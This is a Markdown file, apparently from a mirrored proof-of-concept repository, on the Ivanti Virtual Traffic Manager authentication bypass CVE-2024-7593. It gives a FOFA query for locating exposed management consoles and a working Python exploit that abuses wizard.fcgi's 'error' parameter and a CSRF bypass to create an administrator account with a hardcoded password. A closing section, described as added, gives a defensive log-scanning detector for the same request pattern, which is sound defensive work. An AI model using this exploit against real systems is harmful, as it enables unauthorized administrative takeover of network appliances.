mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
54 lines
1.6 KiB
Markdown
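# Ivanti Virtual Traffic Manager authentication bypass vulnerability (CVE-2024-7593)

Multiple versions of Ivanti Virtual Traffic Manager (vTM) are affected by an authentication bypass vulnerability (CVE-2024-7593). Because of an incorrect implementation of the authentication algorithm, an unauthenticated remote attacker can bypass authentication on an internet-facing vTM management console and create an administrative user without authorization.

## fofa

```javascript
"Pulse Secure vTM Administration Server"
```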

## poc

```python
import requests

# Set to target address
admin_portal = 'https://1.1.1.1:9090'

# User to create
new_admin_name = 'ldwkadmin'
new_admin_password = 'ldwkadmin1234'

requests.packages.urllib3.disable_warnings()
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
           'section': 'Access Management:LocalUsers' }

# Create new user request
# _form_submitted to bypass CSRF
data = { '_form_submitted': 'form',
         'create_user': 'Create',
         'group': 'admin',
         'newusername': new_admin_name,
         'password1': new_admin_password,
         'password2': new_admin_password }

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")
```
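
For defenders, the request shape used by the PoC above (a request to `/apps/zxtm/wizard.fcgi` carrying an `error` query parameter) can be hunted in the management interface's access logs. The following is an added example, not part of the original repository; the log format, the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in a combined-log-like format (assumed, not vTM's own
# log format); client addresses come from documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Aug/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120
198.51.100.7 - - [14/Aug/2024:10:03:41 +0000] "POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1" 200 8342
198.51.100.7 - - [14/Aug/2024:10:03:55 +0000] "GET /apps/zxtm/wizard.fcgi?error=1&section=Home HTTP/1.1" 200 2210
192.0.2.10 - - [14/Aug/2024:10:05:00 +0000] "GET /apps/zxtm/wizard.fcgi?section=Home HTTP/1.1" 302 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
WIZARD_PATH = "/apps/zxtm/wizard.fcgi"
USER_SECTION = "Access Management:LocalUsers"


def classify(line):
    """Return a finding dict for a suspicious wizard.fcgi request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    # Normalise percent-encoding and case so trivially obfuscated paths still match.
    if unquote(url.path).rstrip("/").lower() != WIZARD_PATH:
        return None
    # keep_blank_values: flag 'error' even when it is sent with an empty value.
    query = parse_qs(url.query, keep_blank_values=True)
    if "error" not in query:
        return None
    section = query.get("section", [""])[0]
    # The PoC POSTs to the local-users section; anything else is still worth a look.
    severity = "high" if method == "POST" and section == USER_SECTION else "medium"
    return {"ip": ip, "time": ts, "method": method, "section": section,
            "status": int(status), "severity": severity}


def scan(log_text):
    """Classify every line and return the findings in log order."""
    return [hit for line in log_text.splitlines() if (hit := classify(line))]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs do not carry the POST body, so a `high` finding should be followed by a review of the local user list for unexpected accounts in the `admin` group.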